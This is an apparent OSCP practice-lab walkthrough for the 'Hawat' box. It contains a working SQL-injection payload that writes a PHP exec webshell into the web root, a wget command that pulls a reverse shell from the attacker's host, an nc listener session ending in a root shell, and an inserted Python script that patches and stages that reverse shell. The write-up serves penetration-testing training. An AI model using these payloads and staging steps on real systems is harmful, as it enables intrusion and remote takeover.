OSCP practice range: Hawat
Key points (directory scanning + zip file download + Java code audit + SQL injection in web app 1 used to write a webshell into web app 2's web root)
1. nmap scan
##
┌──(root㉿kali)-[~/Desktop]
└─# nmap 192.168.158.147 -sV -sC -Pn --min-rate 2500 -p-
Starting Nmap 7.92 ( https://nmap.org ) at 2024-04-11 07:18 EDT
Nmap scan report for 192.168.158.147
Host is up (0.23s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4 (protocol 2.0)
| ssh-hostkey:
| 3072 78:2f:ea:84:4c:09:ae:0e:36:bf:b3:01:35:cf:47:22 (RSA)
| 256 d2:7d:eb:2d:a5:9a:2f:9e:93:9a:d5:2e:aa:dc:f4:a6 (ECDSA)
|_ 256 b6:d4:96:f0:a4:04:e4:36:78:1e:9d:a5:10:93:d7:99 (ED25519)
111/tcp closed rpcbind
139/tcp closed netbios-ssn
443/tcp closed https
445/tcp closed microsoft-ds
17445/tcp open unknown
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Type: text/html;charset=UTF-8
| Content-Language: en-US
| Date: Thu, 11 Apr 2024 11:19:48 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <title>Issue Tracker</title>
| <link href="/css/bootstrap.min.css" rel="stylesheet" />
| </head>
| <body>
| <section>
| <div class="container mt-4">
| <span>
| <div>
| href="/login" class="btn btn-primary" style="float:right">Sign In</a>
| href="/register" class="btn btn-primary" style="float:right;margin-right:5px">Register</a>
| </div>
| </span>
| <br><br>
| <table class="table">
| <thead>
| <tr>
| <th>ID</th>
| <th>Message</th>
| <th>P
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET,HEAD,OPTIONS
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| Cache-Control: no-cache, no-store, max-age=0, must-revalidate
| Pragma: no-cache
| Expires: 0
| X-Frame-Options: DENY
| Content-Length: 0
| Date: Thu, 11 Apr 2024 11:19:48 GMT
| Connection: close
| RTSPRequest:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 435
| Date: Thu, 11 Apr 2024 11:19:49 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400
| Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_ Request</h1></body></html>
30455/tcp open http nginx 1.18.0
|_http-title: W3.CSS
|_http-server-header: nginx/1.18.0
50080/tcp open http Apache httpd 2.4.46 ((Unix) PHP/7.4.15)
|_http-title: W3.CSS Template
| http-methods:
|_ Potentially risky methods: TRACE
2. User priv
2.1 Directory scanning & quick Java code audit
## Directory scan of the three web ports:
##################
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:17445/
[08:25:04] 200 - 1KB - /login
[08:25:05] 302 - 0B - /logout -> http://192.168.158.147:17445/index
[08:25:21] 200 - 2KB - /register
Task Completed
##########
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:30455/
[08:24:38] 301 - 169B - /4 -> http://192.168.158.147:30455/4/
[08:25:29] 200 - 3KB - /index.php
[08:25:50] 200 - 67KB - /phpinfo.php
Task Completed
##################
##
┌──(root㉿kali)-[~/Desktop]
└─# dirsearch --url http://192.168.158.147:50080/
[08:25:07] 301 - 239B - /4 -> http://192.168.158.147:50080/4/
[08:25:49] 301 - 243B - /cloud -> http://192.168.158.147:50080/cloud/
[08:25:49] 302 - 0B - /cloud/ -> http://192.168.158.147:50080/cloud/index.php/login
[08:25:58] 403 - 994B - /error/
[08:26:03] 301 - 244B - /images -> http://192.168.158.147:50080/images/
[08:26:03] 200 - 1KB - /images/
[08:26:04] 200 - 9KB - /index.html
Task Completed
######################
## Visiting /cloud/ redirects to the login page below; the weak password admin:admin gets in:
http://192.168.158.147:50080/cloud/index.php/login
###
#############
## Unpack the downloaded zip (the Issue Tracker source) and grep for keywords such as password:
┌──(root㉿kali)-[~/Downloads/issuetracker]
└─# grep password -r ./*
./mvnw: wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath"
./src/main/java/com/issue/tracker/users/UserDetailsServiceImpl.java: //change here to store encoded password in db
./src/main/java/com/issue/tracker/users/UserDetailsServiceImpl.java: .password(users.getPassword())
./src/main/java/com/issue/tracker/users/Users.java: private String password;
./src/main/java/com/issue/tracker/users/Users.java: return password;
./src/main/java/com/issue/tracker/users/Users.java: public void setPassword(String password) {
./src/main/java/com/issue/tracker/users/Users.java: this.password = password;
./src/main/java/com/issue/tracker/issues/IssueController.java: connectionProps.put("password", "ManagementInsideOld797");
./src/main/java/com/issue/tracker/config/WebSecurityConfig.java: auth.userDetailsService(userDetailsService).passwordEncoder(bCryptPasswordEncoder);
./src/main/resources/templates/user_form.html: <input th:field="*{password}" type="password" class="form-control"/>
./src/main/resources/templates/login.html: <input th:field="*{password}" type="password" class="form-control"/>
./src/main/resources/application.properties:spring.datasource.password=ManagementInsideOld797
./src/main/resources/static/js/jquery-3.4.1.js:for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) {
./src/main/resources/static/js/jquery-3.4.1.js: password: null,
./src/main/resources/static/js/jquery-3.4.1.js: options.password
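The grep above surfaces two real leaks (the hardcoded JDBC password in IssueController.java and in application.properties) among jQuery, template and Maven wrapper noise. The script below is an added example, not part of the original walkthrough or of the Issue Tracker project: it scans a source tree for credential-looking literals, skips vendored JavaScript, and drops values that are placeholders or variable references. The keyword list and SAMPLE_FILES are constructed here; SAMPLE_FILES mirrors the grep hits shown on this page.

```python
"""Hunt hardcoded credentials in an unpacked source tree.

Added example, not part of the original walkthrough or of the Issue Tracker
project. It refines the page's `grep password -r ./*`: vendored JavaScript is
skipped, and hits whose value is a placeholder (null/true/the word password
itself) or a variable reference ($MVNW_PASSWORD) are dropped, so the real
leaks surface on their own. SAMPLE_FILES is constructed to mirror the grep
output on this page.
"""
import os
import re

KEYWORDS = r"(?:password|passwd|pwd|secret|token|api[_-]?key)"
# keyword, optional closing quote, then =, : or , (for map.put("password", "...")),
# then an optional opening quote and the value itself.
CRED_RE = re.compile(
    rf"(?i)\b{KEYWORDS}\b[\"']?\s*[=:,]\s*[\"']?(?P<value>[^\s\"',;)]+)"
)
SKIP_DIRS = {".git", "node_modules", "target", "build"}
SKIP_PATH_FRAGMENTS = ("static/js/", "/vendor/")
PLACEHOLDERS = {"null", "none", "true", "false", "password", "passwd", "pwd",
                "secret", "token", "changeme", "xxx"}

# Constructed sample: one line per grep hit from the page, same files and shapes.
SAMPLE_FILES = {
    "mvnw": 'wget --http-user=$MVNW_USERNAME --http-password=$MVNW_PASSWORD "$jarUrl" -O "$wrapperJarPath"\n',
    "src/main/java/com/issue/tracker/users/UserDetailsServiceImpl.java":
        "//change here to store encoded password in db\n.password(users.getPassword())\n",
    "src/main/java/com/issue/tracker/users/Users.java":
        "private String password;\npublic void setPassword(String password) {\nthis.password = password;\n",
    "src/main/java/com/issue/tracker/issues/IssueController.java":
        'connectionProps.put("password", "ManagementInsideOld797");\n',
    "src/main/java/com/issue/tracker/config/WebSecurityConfig.java":
        "auth.userDetailsService(userDetailsService).passwordEncoder(bCryptPasswordEncoder);\n",
    "src/main/resources/templates/login.html":
        '<input th:field="*{password}" type="password" class="form-control"/>\n',
    "src/main/resources/application.properties":
        "spring.datasource.password=ManagementInsideOld797\n",
    "src/main/resources/static/js/jquery-3.4.1.js":
        "for ( i in { radio: true, checkbox: true, file: true, password: true, image: true } ) {\npassword: null,\n",
}


def is_noise(value):
    v = value.strip()
    return (not v
            or v.lower() in PLACEHOLDERS
            or v.startswith(("$", "${", "{", "*{", "%")))  # env/shell/template references


def scan_text(path, text):
    """Return (path, lineno, value) for every credential-looking literal in text."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for m in CRED_RE.finditer(line):
            if not is_noise(m.group("value")):
                hits.append((path, lineno, m.group("value")))
    return hits


def scan_sources(files):
    """files: {relative_path: text}. Vendored paths are skipped before matching."""
    hits = []
    for path, text in files.items():
        norm = path.replace("\\", "/")
        if any(frag in norm for frag in SKIP_PATH_FRAGMENTS) or norm.endswith(".min.js"):
            continue
        hits.extend(scan_text(path, text))
    return hits


def scan_tree(root):
    """Read a directory tree into the {path: text} shape and scan it."""
    files = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in SKIP_DIRS]
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                with open(full, errors="replace") as fh:
                    files[os.path.relpath(full, root)] = fh.read()
            except OSError:
                continue
    return scan_sources(files)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for path, lineno, value in (scan_tree(target) if target else scan_sources(SAMPLE_FILES)):
        print(f"{path}:{lineno}: {value}")
```

Run it with a directory argument to scan a real unpacked tree; with no argument it scans the embedded sample and reports only the IssueController.java and application.properties lines. The regex deliberately requires a separator (=, : or ,) after the keyword, which is why getters, field declarations and passwordEncoder calls never match.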
#################
## SSH login with these credentials fails:
user issue_user
password ManagementInsideOld797
########################
##
Reviewing IssueController.java (the class that opens its own JDBC connection, as the grep hit above shows) turns up a SQL injection in the priority parameter of /issue/checkByPriority, and phpinfo.php on port 30455 exposes the PHP server's web root. Plan: use the injection in the Java app to write a webshell into the PHP app's document root.
2.2 Writing a webshell via SQL injection:
## Web root, taken from phpinfo.php on port 30455:
$_SERVER['DOCUMENT_ROOT'] /srv/http
## Webshell to drop (double quotes only, so it can sit inside a single-quoted MySQL string literal):
<?php echo exec($_GET["cmd"]);
## Final payload. The trailing space after -- is part of the payload: MySQL only treats "-- " followed by whitespace as a comment.
priority=Normal' UNION SELECT '<?php echo exec($_GET["cmd"]);' INTO OUTFILE '/srv/http/cmd.php'; -- 
## Preconditions for INTO OUTFILE: the DB user needs the FILE privilege, secure_file_priv must not restrict the target directory, mysqld must be able to write into /srv/http, and the file must not already exist (MySQL refuses to overwrite).
## URL-encode the value, e.g. with https://www.urlencoder.org/ (spaces become +, so the trailing space becomes the final +):
Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+
## Replay in Burp (the encoder leaves spaces as + rather than %20; either works, but do not drop the trailing one):
POST /issue/checkByPriority?priority=Normal%27+UNION+SELECT+%27%3C%3Fphp+echo+exec%28%24_GET%5B%22cmd%22%5D%29%3B%27+INTO+OUTFILE+%27%2Fsrv%2Fhttp%2Fcmd.php%27%3B+--+ HTTP/1.1
Host: 192.168.158.147:17445
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: JSESSIONID=E408CE3E9BBBEC15DCAD194F380E68A9
Upgrade-Insecure-Requests: 1
## If all went well, confirm the file exists (the web server that exposed phpinfo.php is the one on port 30455):
kali@kali:~$ curl "http://192.168.158.147:30455/cmd.php?cmd=id"
##############
##
2.3 Interactive reverse shell:
##
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
## Edit the reverse shell's listener IP and port (192.168.45.195:443 here), serve it from Kali, and fetch it into the web root through the webshell:
http://192.168.158.147:30455/cmd.php?cmd=wget%20http://192.168.45.195:443/lrshell.php%20-O%20/srv/http/lrshell.php
### On Kali:
┌──(root㉿kali)-[~/Desktop]
└─# python -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
192.168.158.147 - - [11/Apr/2024 11:05:18] "GET /lrshell.php HTTP/1.1" 200 -
## Stop the Python HTTP server, start the nc listener below (both use port 443 here), then open the uploaded shell in the browser:
http://192.168.158.147:30455/lrshell.php
#######
##
┌──(root㉿kali)-[~/Desktop]
└─# nc -lvvp 443
listening on [any] 443 ...
192.168.158.147: inverse host lookup failed: Unknown host
connect to [192.168.45.195] from (UNKNOWN) [192.168.158.147] 43712
Linux hawat 5.10.14-arch1-1 #1 SMP PREEMPT Sun, 07 Feb 2021 22:42:17 +0000 x86_64 GNU/Linux
15:06:07 up 3:50, 0 users, load average: 0.05, 0.04, 0.00
USER TTY LOGIN@ IDLE JCPU PCPU WHAT
uid=0(root) gid=0(root) groups=0(root)
sh: cannot set terminal process group (1838): Inappropriate ioctl for device
sh: no job control in this shell
sh-5.1# whoami
whoami
root
sh-5.1# cat /root/proof.txt
cat /root/proof.txt
9643c700b5e14b23afb54d4293548a99
sh-5.1#
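The staging steps above (patch the listener address into the PHP reverse shell, then pull it onto the target through cmd.php) as a script. This is an added example, not part of the original walkthrough or of pentestmonkey's project; it assumes the shell script keeps the pentestmonkey-style `$ip = '...';` and `$port = ...;` lines, that the command webshell is cmd.php on the port-30455 server, and that the web root is /srv/http as phpinfo.php reported. SAMPLE_SHELL is a constructed stand-in for the head of php-reverse-shell.php.

```python
"""Patch the PHP reverse shell for this box and build the fetch URL for cmd.php.

Added example, not part of the original walkthrough. Assumes pentestmonkey-style
`$ip = '...';` / `$port = ...;` lines, cmd.php on the port-30455 server, and a
web root of /srv/http.
"""
import re
import sys
import urllib.parse
from pathlib import Path

# Constructed stand-in for the head of php-reverse-shell.php; the real file has
# the same two lines with 127.0.0.1 / 1234 as placeholders.
SAMPLE_SHELL = """<?php
set_time_limit (0);
$VERSION = "1.0";
$ip = '127.0.0.1';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
$chunk_size = 1400;
"""

IP_RE = re.compile(r"^(\s*\$ip\s*=\s*)'[^']*'(\s*;)", re.M)
PORT_RE = re.compile(r"^(\s*\$port\s*=\s*)\d+(\s*;)", re.M)


def patch_reverse_shell(src, lhost, lport):
    """Rewrite the $ip/$port lines. Raises if either is missing so a shell still
    pointing at 127.0.0.1:1234 is never staged by accident."""
    new_src, n_ip = IP_RE.subn(rf"\g<1>'{lhost}'\g<2>", src)
    new_src, n_port = PORT_RE.subn(rf"\g<1>{int(lport)}\g<2>", new_src)
    if n_ip != 1 or n_port != 1:
        raise ValueError(f"expected one $ip and one $port line, got {n_ip}/{n_port}")
    return new_src


def fetch_url(cmd_shell_base, lhost, http_port, name, webroot="/srv/http"):
    """URL that makes cmd.php wget the staged shell into the web root.

    Only spaces need encoding for this command; '/' and ':' are left alone so
    the result matches the URL used on the page."""
    cmd = f"wget http://{lhost}:{http_port}/{name} -O {webroot}/{name}"
    return f"{cmd_shell_base}/cmd.php?cmd={urllib.parse.quote(cmd, safe='/:')}"


if __name__ == "__main__":
    # python3 stage_shell.py php-reverse-shell.php 192.168.45.195 443 lrshell.php
    src_path, lhost, lport, name = sys.argv[1:5]
    Path(name).write_text(patch_reverse_shell(Path(src_path).read_text(), lhost, lport))
    # Serve `name` with `python3 -m http.server <port>`, open the URL below through
    # the webshell, then stop the HTTP server and start `nc -lvvp <port>` before
    # browsing to the uploaded file (the page reuses 443 for both, so they cannot
    # run at the same time).
    print(fetch_url("http://192.168.158.147:30455", lhost, lport, name))
```

The subn counts are the safety check: if pentestmonkey's file layout ever changes, or the wrong file is passed in, the script refuses instead of silently uploading a shell that calls back to 127.0.0.1.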
3. Root priv
## The reverse shell already comes back as root (uid=0): the PHP process behind port 30455 runs as root on this box, so no privilege escalation step is needed and proof.txt is read directly above.
4. Summary:
## Chain: dirsearch on the three web ports -> admin:admin on the cloud app -> Issue Tracker source zip -> hardcoded DB password and SQL injection in IssueController -> INTO OUTFILE into the PHP web root learned from phpinfo.php (port 30455) -> webshell -> reverse shell as root.
## Reference:
https://medium.com/@blueclps080984/proving-grounds-hawat-easy-linux-box-walkthrough-a-journey-to-offensive-security-cc24110b246f